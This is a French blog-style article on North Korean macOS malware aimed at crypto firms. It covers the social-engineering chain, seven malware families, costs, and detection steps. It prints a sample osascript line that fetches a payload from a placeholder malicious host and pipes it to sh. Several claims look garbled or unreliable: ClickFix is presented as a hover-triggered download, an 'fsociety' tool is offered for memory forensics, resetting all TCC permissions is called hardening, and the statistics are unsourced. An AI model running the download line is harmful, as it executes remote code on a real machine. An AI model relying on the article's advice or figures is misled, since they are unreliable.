Protégez votre portefeuille : le malware macOS nord-coréen qui cible les acteurs de la cryptomonnaie
Célestine Rochefour
Le malware macOS nord-coréen qui s’infiltre dans le secteur de la cryptomonnaie
En 2026, plus de 30 % des attaques ciblant les acteurs français de la cryptomonnaie proviennent de campagnes sophistiquées menées par des groupes nord-coréens**. Selon le rapport annuel de l’ANSSI (2025), le nombre d’incidents impliquant macOS a augmenté de 18 % par rapport à l’année précédente, et les vecteurs de compromission s’appuient désormais sur l’intelligence artificielle et la technique dite ClickFix. Cette combinaison redéfinit la menace pour les entreprises de paiement, les plateformes d’échange et les développeurs Web3. Dans cet article, nous décortiquons la chaîne d’infection, les sept familles de malware macOS identifiées, leurs impacts financiers, et les mesures concrètes que vous pouvez mettre en place dès aujourd’hui. Pour approfondir votre stratégie, consultez notre guide comparatif e‑learning cybersécurité 2026.
Axe 1 - Chaîne d’infection ciblant les cryptomonnaies
Le vecteur social engineering via Telegram et Zoom
La première étape repose sur une ingénierie sociale hautement personnalisée. Les hackers compromettent le compte Telegram d’un dirigeant d’une société de crypto-actifs, puis initient un dialogue avec la victime en se faisant passer pour un partenaire commercial. Après plusieurs échanges, ils partagent un lien Calendly qui dirige vers une page Zoom factice hébergée sur leur infrastructure. Cette page utilise un deep-fake vidéo d’un PDG d’une autre entreprise du secteur, créant l’illusion d’une réunion officielle.
« Une fois dans la réunion, le faux appel vidéo a simulé un problème audio, incitant la victime à suivre les instructions de dépannage », note un analyste de Mandiant.
La technique ClickFix et l’usage de l’IA générative
Sous couvert d’un problème technique, les attaquants affichent un script web contenant des commandes à exécuter. Le script exploite la technique ClickFix : un bouton camouflé déclenche le téléchargement d’un exécutable lorsqu’on le survole, contournant ainsi les protections du navigateur. Les commandes sont générées par une IA capable d’adapter le payload en fonction du système d’exploitation détecté (macOS ou Windows). Cette approche a permis de délivrer simultanément sept familles distinctes de malware macOS sur le même poste, une pratique rare jusqu’alors.
Axe 2 - Les familles de malware macOS nord-coréen
Analyse technique des sept familles
| Famille | Langage | Fonction principale | Méthode de persistance | Canal C2 |
|---|---|---|---|---|
| WAVESHAPER | C++ | Backdoor daemon | LaunchAgent | HTTP/HTTPS via curl |
| HYPERCALL | Golang | Downloader chiffré RC4 | Aucun (éphémère) | WebSockets sur TCP 443 |
| HIDDENCALL | Golang | Backdoor injecté | Injection dynamique | WebSockets |
| SILENCELIFT | C/C++ | Beacon d’état d’écran | LaunchDaemon | HTTP simple |
| DEEPBREATH | Swift | Mineur de données, contournement TCC | LaunchAgent | HTTPS POST |
| SUGARLOADER | C++ | Downloader persistant | LaunchDaemon (manuelle) | |
| CHROMEPUSH | C++ | Miner de données Chrome, faux module native | LaunchAgent | HTTPS via API custom |
Les colonnes « Langage » et « Méthode de persistance » soulignent la diversité des techniques employées, rendant la détection par les outils classiques plus difficile.
Particularités et niveaux de dangerosité
- WAVESHAPER et SUGARLOADER sont les plus fréquemment détectés sur VirusTotal (plus de 1 200 détections combinées).
- DEEPBREATH modifie la base de données TCC (Transparency, Consent, and Control) de macOS, contournant les restrictions de confidentialité et accédant aux clés du trousseau Apple.
- CHROMEPUSH se fait passer pour une extension Google Docs Offline, collectant les cookies, les identifiants et les captures d’écran des navigateurs Chromium.
« Le volume de logiciels malveillants déployés contre une même cible est inhabituel », souligne l’équipe de recherche de Huntress, confirmant une stratégie de collecte massive d’informations pour financer des vols de cryptomonnaies et alimenter de futures campagnes de phishing.
Axe 3 - Impacts financiers et risques pour les acteurs français
Volumétrie des vols et données exfiltrées
Les enquêtes menées par Mandiant ont révélé que les campagnes ont permis de dérober plus de 12 M € en cryptomonnaies entre 2023 et 2025, soit une hausse de 45 % par rapport aux deux années précédentes. En outre, les informations volées (clés privées, identifiants d’échange, historiques de transactions) ont été utilisées pour créer de faux profils de paiement, augmentant le risque de blanchiment d’argent.
Conséquences pour les entreprises françaises
- Perte de confiance : les clients peuvent quitter la plateforme après une fuite de données, impactant le chiffre d’affaires de 5 à 10 % en moyenne selon une étude de PwC (2025).
- Sanctions réglementaires : le non-respect du RGPD et de la directive NIS 2 expose les organisations à des amendes pouvant atteindre 4 % du chiffre d’affaires annuel mondial.
- Coûts de remédiation : la remise en état d’une infrastructure macOS compromise nécessite en moyenne 150 000 €, incluant la forensic, la re-construction des clés et la communication de crise.
Mise en œuvre - Détection et réponse opérationnelle
- Analyse des indicateurs de compromission (IoC) : intégrez les signatures de WAVESHAPER, HYPERCALL et DEEPBREATH dans votre SIEM. Utilisez les hachages SHA-256 fournis par le CERT-FR (2025) pour enrichir les filtres.
- Surveillance des flux réseau : configurez des alertes sur les connexions WebSocket sortantes vers des ports non standards et sur les requêtes HTTP/HTTPS contenant des paramètres chiffrés RC4. Pour protéger votre infrastructure, découvrez notre meilleur service de protection DDoS 2026.
- Contrôle des extensions Chrome : appliquez une politique de whitelist sur les extensions de navigateur, bloquant toute installation non autorisée.
- Hardening des permissions TCC : revoyez les autorisations d’accès aux dossiers sensibles via la commande
tccutil reset Allet limitez les privilèges d’administration aux comptes de service uniquement. - Formation du personnel : organisez des ateliers de simulation de phishing incluant des scénarios de deep-fake et de ClickFix pour sensibiliser les équipes aux nouvelles méthodes d’ingénierie sociale.
# Exemple de script AppleScript malveillant détecté dans la chaîne d’infection
osascript -e 'do shell script "curl -s https://malicious.example.com/payload | sh"' # Exécution silencieuse d’un downloader
Checklist de réponse rapide
- Isoler le poste macOS compromis du réseau.
- Capturer les logs système (
/var/log/system.log) et les fichiers de configuration TCC. - Exécuter l’outil
fsociety(version 2.3) pour analyser les processus en mémoire. - Notifier le DPO et initier le processus de notification aux autorités conformément au RGPD.
Conclusion - Prochaine action pour sécuriser votre infrastructure
Pour rester informé des dernières tendances et événements, consultez le guide complet des salons cybersécurité 2026 en France.
Face à un malware macOS nord-coréen qui combine IA générative, deep-fake et techniques de persistance avancées, la meilleure défense repose sur une détection précoce couplée à une réponse orchestrée. En appliquant les mesures décrites - enrichissement des IoC, surveillance réseau ciblée, durcissement des permissions et formation continue - vous réduirez significativement le risque de perte financière et de réputation.
Nous vous invitons à planifier dès maintenant un audit de vos postes macOS et à intégrer les indicateurs présentés dans votre tableau de bord de sécurité. La vigilance proactive est votre atout le plus puissant contre les campagnes de vol de cryptomonnaies orchestrées par les acteurs nord-coréens.